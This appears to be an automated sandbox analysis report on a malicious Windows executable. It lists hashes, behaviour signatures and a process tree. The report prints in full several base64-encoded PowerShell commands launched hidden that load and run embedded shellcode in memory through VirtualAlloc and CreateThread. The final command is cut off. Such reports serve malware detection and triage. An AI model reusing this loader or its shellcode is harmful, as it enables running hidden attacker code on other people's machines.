773365765b15ea9c6fff1a7c8cd943596c079c6d3fc8080e10407bdcbca1f70d

General

Target

original.exe
Size

345KB
MD5

bb912d0fbd20af67c817d821fe09fe9a
SHA1

7c3769282e4f97f8c48e454a64a78491687b85c4
SHA256

f2e63f4c56e6b61e4aec708daea4e8a5abbb435b1d9cdeb8e2b8d5c70422b2fa
SHA512

ab05d969b26969c380a7fee8432e3995769abf951c6bae9ef2ae7702401b353b8eafe927590239128ea1c1452948ae4024fed07e7ec2dab7bb289b488f0a717e

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

912 powershell.exe
1056 powershell.exe
2020 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 912 powershell.exe
Token: SeDebugPrivilege 1056 powershell.exe
Token: SeDebugPrivilege 2020 powershell.exe

pid	process
912	powershell.exe
1056	powershell.exe
2020	powershell.exe

description	pid	process
Token: SeDebugPrivilege	912	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

original.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 1052 wrote to memory of 912	1052	original.exe	powershell.exe
PID 1052 wrote to memory of 912	1052	original.exe	powershell.exe
PID 1052 wrote to memory of 912	1052	original.exe	powershell.exe
PID 912 wrote to memory of 1056	912	powershell.exe	powershell.exe
PID 912 wrote to memory of 1056	912	powershell.exe	powershell.exe
PID 912 wrote to memory of 1056	912	powershell.exe	powershell.exe
PID 1056 wrote to memory of 2020	1056	powershell.exe	powershell.exe
PID 1056 wrote to memory of 2020	1056	powershell.exe	powershell.exe
PID 1056 wrote to memory of 2020	1056	powershell.exe	powershell.exe
PID 1056 wrote to memory of 2020	1056	powershell.exe	powershell.exe
PID 2020 wrote to memory of 520	2020	powershell.exe	csc.exe
PID 2020 wrote to memory of 520	2020	powershell.exe	csc.exe
PID 2020 wrote to memory of 520	2020	powershell.exe	csc.exe
PID 2020 wrote to memory of 520	2020	powershell.exe	csc.exe
PID 520 wrote to memory of 1308	520	csc.exe	cvtres.exe
PID 520 wrote to memory of 1308	520	csc.exe	cvtres.exe
PID 520 wrote to memory of 1308	520	csc.exe	cvtres.exe
PID 520 wrote to memory of 1308	520	csc.exe	cvtres.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABDADUAdQAgAD0AIAAnACQAUwBCAGEANQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABTAEIAYQA1ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeABiAGEALAAwAHgAYwBkACwAMAB4ADAANgAsADAAeABhAGIALAAwAHgAYgAyACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADEANgAsADAAeABlADIALAAwAHgAMwA4ACwAMAB4AGYAYQAsADAAeAA0ADMALAAwAHgAMwAwACwAMAB4AGMAMgAsADAAeAAwADMALAAwAHgAOQA0ACwAMAB4ADUANQAsADAAeAA0AGIALAAwAHgAZQA2ACwAMAB4AGEANQAsADAAeAA1ADUALAAwAHgAMgBmACwAMAB4ADYAMgAsADAAeAA5ADUALAAwAHgANgA1ACwAMAB4ADIANAAsADAAeAAyADYALAAwAHgAMQBhACwAMAB4ADAAZAAsADAAeAA2ADgALAAwAHgAZAAzACwAMAB4AGEAOQAsADAAeAA2ADMALAAwAHgAYQA0ACwAMAB4AGQANAAsADAAeAAxAGEALAAwAHgAYwA5ACwAMAB4ADkAMgAsADAAeABkAGIALAAwAHgAOQBiACwAMAB4ADYAMgAsADAAeABlADYALAAwAHgANwBhACwAMAB4ADEAOAAsADAAeAA3ADkALAAwAHgAMwBhACwAMAB4ADUAZAAsADAAeAAyADEALAAwAHgAYgAyACwAMAB4ADQAZgAsADAAeAA5AGMALAAwAHgANgA2ACwAMAB4AGEAZgAsADAAeABiAGQALAAwAHgAYwBjACwAMAB4ADMAZgAsADAAeABiAGIALAAwAHgAMQAzACwAMAB4AGUAMQAsADAAeAAzADQALAAwAHgAZgAxACwAMAB4AGEAZgAsADAAeAA4AGEALAAwAHgAMAA3ACwAMAB4ADEANwAsADAAeABiADcALAAwAHgANgBmACwAMAB4AGQAZgAsADAAeAAxADYALAAwAHgAOQA2ACwAMAB4ADIAMQAsADAAeAA2AGIALAAwAHgANAAxACwAMAB4ADMAOAAsADAAeABjADMALAAwAHgAYgA4ACwAMAB4AGYAOQAsADAAeAA3ADEALAAwAHgAZABiACwAMAB4AGQAZAAsADAAeABjADQALAAwAHgAYwA4ACwAMAB4ADUAMAAsADAAeAAxADUALAAwAHgAYgAyACwAMAB4AGMAYgAsADAAeABiADAALAAwAHgANgA3ACwAMAB4ADMAYgAsADAAeAA2ADcALAAwAHgAZgBkACwAMAB4ADQANwAsADAAeABjAGUALAAwAHgANwA2ACwAMAB4ADMAOQAsADAAeAA2AGYALAAwAHgAMwAxACwAMAB4ADAAZAAsADAAeAAzADMALAAwAHgAOQAzACwAMAB4AGMAYwAsADAAeAAxADUALAAwAHgAOAAwACwAMAB4AGUAOQAsADAAeAAwAGEALAAwAHgAOQAwACwAMAB4ADEAMwAsADAAeAA0ADkALAAwAHgAZAA4ACwAMAB4ADAAMgAsADAAeABmADgALAAwAHgANgBiACwAMAB4ADAAZAAsADAAeABkADQALAAwAHgAOABiACwAMAB4ADYAMAAsADAAeABmAGEALAAwAHgAOQAzACwAMAB4AGQANAAsADAAeAA2ADQALAAwAHgAZgBkACwAMAB4ADcAMAAsADAAeAA2AGYALAAwAHgAOQAwACwAMAB4ADcANgAsADAAeAA3ADcALAAwAHgAYQAwACwAMAB4ADEAMAAsADAAeABjAGMALAAwAHgANQAzACwAMAB4ADYANAAsADAAeAA3ADgALAAwAHgAOQA2ACwAMAB4AGYAYQAsADAAeAAzAGQALAAwAHgAMgA0ACwAMAB4ADcAOQAsADAAeAAwADMALAAwAHgANQBkACwAMAB4ADgANwAsADAAeAAyADYALAAwAHgAYQAxACwAMAB4ADEANQAsADAAeAAyAGEALAAwAHgAMwAyACwAMAB4AGQAOAAsADAAeAA3ADcALAAwAHgAMgAzACwAMAB4AGYANwAsADAAeABkADAALAAwAHgAOAA3ACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgANgAzACwAMAB4AGYAYgAsADAAeAA4ADEALAAwAHgAMAAwACwAMAB4AGQAZgAsADAAeAA5ADMALAAwAHgAYQA5ACwAMAB4AGMAOQAsADAAeABmADkALAAwAHgANgA0ACwAMAB4AGIAYgAsADAAeABkAGUALAAwAHgAZgBhACwAMAB4AGIAYgAsADAAeAAwADMALAAwAHgAOABlACwAMAB4ADAANQAsADAAeAAzAGMALAAwAHgANwA0ACwAMAB4ADgANgAsADAAeABjADEALAAwAHgANgA4ACwAMAB4ADIANAAsADAAeABiADAALAAwAHgAZQAwACwAMAB4ADEAMAAsADAAeABhAGYALAAwAHgANAAwACwAMAB4ADAAZAAsADAAeABjADUALAAwAHgANQBhACwAMAB4ADQAYgAsADAAeAA5ADkALAAwAHgAMgA2ACwAMAB4ADMAMgAsADAAeABkADIALAAwAHgAYwBiACwAMAB4AGMAZgAsADAAeAA0ADEALAAwAHgAZQA1ACwAMAB4AGMAYwAsADAAeAAwADAALAAwAHgAYwBmACwAMAB4ADAAMwAsADAAeAA0ADIALAAwAHgANABmACwAMAB4ADkAZgAsADAAeAA5AGIALAAwAHgAMgAyACwAMAB4ADMAZgAsADAAeAA1AGYALAAwAHgANABjACwAMAB4AGMAYQAsADAAeAA1ADUALAAwAHgANQAwACwAMAB4AGIAMwAsADAAeABlAGEALAAwAHgANQA1ACwAMAB4AGIAYQAsADAAeABkAGMALAAwAHgAOAAwACwAMAB4AGIAOQAsADAAeAAxADMALAAwAHgAYgA0ACwAMAB4ADMAYwAsADAAeAAyADMALAAwAHgAMwBlACwAMAB4ADQAZQAsADAAeABkAGQALAAwAHgAYQBjACwAMAB4ADkANAAsADAAeAAyAGEALAAwAHgAZABkACwAMAB4ADIANwAsADAAeAAxAGIALAAwAHgAYwBhACwAMAB4ADkAMwAsADAAeABjAGYALAAwAHgANQA2ACwAMAB4AGQAOAAsADAAeAA0ADMALAAwAHgAMgAwACwAMAB4ADIAZAAsADAAeAA4ADIALAAwAHgAYwA1ACwAMAB4ADMAZgAsADAAeAA5AGIALAAwAHgAYQA5ACwAMAB4AGUAOQAsADAAeABkADUALAAwAHgAMgAwACwAMAB4ADcAOAAsADAAeABiAGUALAAwAHgANAAxACwAMAB4ADIAYgAsADAAeAA1AGQALAAwAHgAOAA4ACwAMAB4AGMAZAAsADAAeABkADQALAAwAHgAOAA4ACwAMAB4ADgAMwAsADAAeABjADQALAAwAHgANAAwACwAMAB4ADcAMwAsADAAeABmAGIALAAwAHgAMgA4ACwAMAB4ADgANQAsADAAeAA3ADMALAAwAHgAZgBiACwAMAB4ADcAZQAsADAAeABjAGYALAAwAHgANwAzACwAMAB4ADkAMwAsADAAeAAyADYALAAwAHgAYQBiACwAMAB4ADIANwAsADAAeAA4ADYALAAwAHgAMgA4ACwAMAB4ADYANgAsADAAeAA1ADQALAAwAHgAMQBiACwAMAB4AGIAZAAsADAAeAA4ADkALAAwAHgAMABkACwAMAB4AGMAOAAsADAAeAAxADYALAAwAHgAZQAyACwAMAB4AGIAMwAsADAAeAAzADcALAAwAHgANQAwACwAMAB4AGEAZAAsADAAeAA0AGMALAAwAHgAMQAyACwAMAB4ADYAMAAsADAAeAA5ADEALAAwAHgAOQBhACwAMAB4ADUAYQAsADAAeAAxADYALAAwAHgAZgBiACwAMAB4ADEAZQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAbABiADUAOAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAbABiADUAOAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAbABiADUAOAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEMANQB1ACkAKQA7ACQAOQBEAFgAbgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFkARgBCADkAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAWQBGAEIAOQAgACQAOQBEAFgAbgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA5AEQAWABuACAAJABlACIAOwB9AA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABDADUAdQAgAD0AIAAnACQAUwBCAGEANQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABTAEIAYQA1ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeABiAGEALAAwAHgAYwBkACwAMAB4ADAANgAsADAAeABhAGIALAAwAHgAYgAyACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADEANgAsADAAeABlADIALAAwAHgAMwA4ACwAMAB4AGYAYQAsADAAeAA0ADMALAAwAHgAMwAwACwAMAB4AGMAMgAsADAAeAAwADMALAAwAHgAOQA0ACwAMAB4ADUANQAsADAAeAA0AGIALAAwAHgAZQA2ACwAMAB4AGEANQAsADAAeAA1ADUALAAwAHgAMgBmACwAMAB4ADYAMgAsADAAeAA5ADUALAAwAHgANgA1ACwAMAB4ADIANAAsADAAeAAyADYALAAwAHgAMQBhACwAMAB4ADAAZAAsADAAeAA2ADgALAAwAHgAZAAzACwAMAB4AGEAOQAsADAAeAA2ADMALAAwAHgAYQA0ACwAMAB4AGQANAAsADAAeAAxAGEALAAwAHgAYwA5ACwAMAB4ADkAMgAsADAAeABkAGIALAAwAHgAOQBiACwAMAB4ADYAMgAsADAAeABlADYALAAwAHgANwBhACwAMAB4ADEAOAAsADAAeAA3ADkALAAwAHgAMwBhACwAMAB4ADUAZAAsADAAeAAyADEALAAwAHgAYgAyACwAMAB4ADQAZgAsADAAeAA5AGMALAAwAHgANgA2ACwAMAB4AGEAZgAsADAAeABiAGQALAAwAHgAYwBjACwAMAB4ADMAZgAsADAAeABiAGIALAAwAHgAMQAzACwAMAB4AGUAMQAsADAAeAAzADQALAAwAHgAZgAxACwAMAB4AGEAZgAsADAAeAA4AGEALAAwAHgAMAA3ACwAMAB4ADEANwAsADAAeABiADcALAAwAHgANgBmACwAMAB4AGQAZgAsADAAeAAxADYALAAwAHgAOQA2ACwAMAB4ADIAMQAsADAAeAA2AGIALAAwAHgANAAxACwAMAB4ADMAOAAsADAAeABjADMALAAwAHgAYgA4ACwAMAB4AGYAOQAsADAAeAA3ADEALAAwAHgAZABiACwAMAB4AGQAZAAsADAAeABjADQALAAwAHgAYwA4ACwAMAB4ADUAMAAsADAAeAAxADUALAAwAHgAYgAyACwAMAB4AGMAYgAsADAAeABiADAALAAwAHgANgA3ACwAMAB4ADMAYgAsADAAeAA2ADcALAAwAHgAZgBkACwAMAB4ADQANwAsADAAeABjAGUALAAwAHgANwA2ACwAMAB4ADMAOQAsADAAeAA2AGYALAAwAHgAMwAxACwAMAB4ADAAZAAsADAAeAAzADMALAAwAHgAOQAzACwAMAB4AGMAYwAsADAAeAAxADUALAAwAHgAOAAwACwAMAB4AGUAOQAsADAAeAAwAGEALAAwAHgAOQAwACwAMAB4ADEAMwAsADAAeAA0ADkALAAwAHgAZAA4ACwAMAB4ADAAMgAsADAAeABmADgALAAwAHgANgBiACwAMAB4ADAAZAAsADAAeABkADQALAAwAHgAOABiACwAMAB4ADYAMAAsADAAeABmAGEALAAwAHgAOQAzACwAMAB4AGQANAAsADAAeAA2ADQALAAwAHgAZgBkACwAMAB4ADcAMAAsADAAeAA2AGYALAAwAHgAOQAwACwAMAB4ADcANgAsADAAeAA3ADcALAAwAHgAYQAwACwAMAB4ADEAMAAsADAAeABjAGMALAAwAHgANQAzACwAMAB4ADYANAAsADAAeAA3ADgALAAwAHgAOQA2ACwAMAB4AGYAYQAsADAAeAAzAGQALAAwAHgAMgA0ACwAMAB4ADcAOQAsADAAeAAwADMALAAwAHgANQBkACwAMAB4ADgANwAsADAAeAAyADYALAAwAHgAYQAxACwAMAB4ADEANQAsADAAeAAyAGEALAAwAHgAMwAyACwAMAB4AGQAOAAsADAAeAA3ADcALAAwAHgAMgAzACwAMAB4AGYANwAsADAAeABkADAALAAwAHgAOAA3ACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgANgAzACwAMAB4AGYAYgAsADAAeAA4ADEALAAwAHgAMAAwACwAMAB4AGQAZgAsADAAeAA5ADMALAAwAHgAYQA5ACwAMAB4AGMAOQAsADAAeABmADkALAAwAHgANgA0ACwAMAB4AGIAYgAsADAAeABkAGUALAAwAHgAZgBhACwAMAB4AGIAYgAsADAAeAAwADMALAAwAHgAOABlACwAMAB4ADAANQAsADAAeAAzAGMALAAwAHgANwA0ACwAMAB4ADgANgAsADAAeABjADEALAAwAHgANgA4ACwAMAB4ADIANAAsADAAeABiADAALAAwAHgAZQAwACwAMAB4ADEAMAAsADAAeABhAGYALAAwAHgANAAwACwAMAB4ADAAZAAsADAAeABjADUALAAwAHgANQBhACwAMAB4ADQAYgAsADAAeAA5ADkALAAwAHgAMgA2ACwAMAB4ADMAMgAsADAAeABkADIALAAwAHgAYwBiACwAMAB4AGMAZgAsADAAeAA0ADEALAAwAHgAZQA1ACwAMAB4AGMAYwAsADAAeAAwADAALAAwAHgAYwBmACwAMAB4ADAAMwAsADAAeAA0ADIALAAwAHgANABmACwAMAB4ADkAZgAsADAAeAA5AGIALAAwAHgAMgAyACwAMAB4ADMAZgAsADAAeAA1AGYALAAwAHgANABjACwAMAB4AGMAYQAsADAAeAA1ADUALAAwAHgANQAwACwAMAB4AGIAMwAsADAAeABlAGEALAAwAHgANQA1ACwAMAB4AGIAYQAsADAAeABkAGMALAAwAHgAOAAwACwAMAB4AGIAOQAsADAAeAAxADMALAAwAHgAYgA0ACwAMAB4ADMAYwAsADAAeAAyADMALAAwAHgAMwBlACwAMAB4ADQAZQAsADAAeABkAGQALAAwAHgAYQBjACwAMAB4ADkANAAsADAAeAAyAGEALAAwAHgAZABkACwAMAB4ADIANwAsADAAeAAxAGIALAAwAHgAYwBhACwAMAB4ADkAMwAsADAAeABjAGYALAAwAHgANQA2ACwAMAB4AGQAOAAsADAAeAA0ADMALAAwAHgAMgAwACwAMAB4ADIAZAAsADAAeAA4ADIALAAwAHgAYwA1ACwAMAB4ADMAZgAsADAAeAA5AGIALAAwAHgAYQA5ACwAMAB4AGUAOQAsADAAeABkADUALAAwAHgAMgAwACwAMAB4ADcAOAAsADAAeABiAGUALAAwAHgANAAxACwAMAB4ADIAYgAsADAAeAA1AGQALAAwAHgAOAA4ACwAMAB4AGMAZAAsADAAeABkADQALAAwAHgAOAA4ACwAMAB4ADgAMwAsADAAeABjADQALAAwAHgANAAwACwAMAB4ADcAMwAsADAAeABmAGIALAAwAHgAMgA4ACwAMAB4ADgANQAsADAAeAA3ADMALAAwAHgAZgBiACwAMAB4ADcAZQAsADAAeABjAGYALAAwAHgANwAzACwAMAB4ADkAMwAsADAAeAAyADYALAAwAHgAYQBiACwAMAB4ADIANwAsADAAeAA4ADYALAAwAHgAMgA4ACwAMAB4ADYANgAsADAAeAA1ADQALAAwAHgAMQBiACwAMAB4AGIAZAAsADAAeAA4ADkALAAwAHgAMABkACwAMAB4AGMAOAAsADAAeAAxADYALAAwAHgAZQAyACwAMAB4AGIAMwAsADAAeAAzADcALAAwAHgANQAwACwAMAB4AGEAZAAsADAAeAA0AGMALAAwAHgAMQAyACwAMAB4ADYAMAAsADAAeAA5ADEALAAwAHgAOQBhACwAMAB4ADUAYQAsADAAeAAxADYALAAwAHgAZgBiACwAMAB4ADEAZQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAbABiADUAOAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAbABiADUAOAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAbABiADUAOAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEMANQB1ACkAKQA7ACQAOQBEAFgAbgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFkARgBCADkAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAWQBGAEIAOQAgACQAOQBEAFgAbgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA5AEQAWABuACAAJABlACIAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABTAEIAYQA1ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0A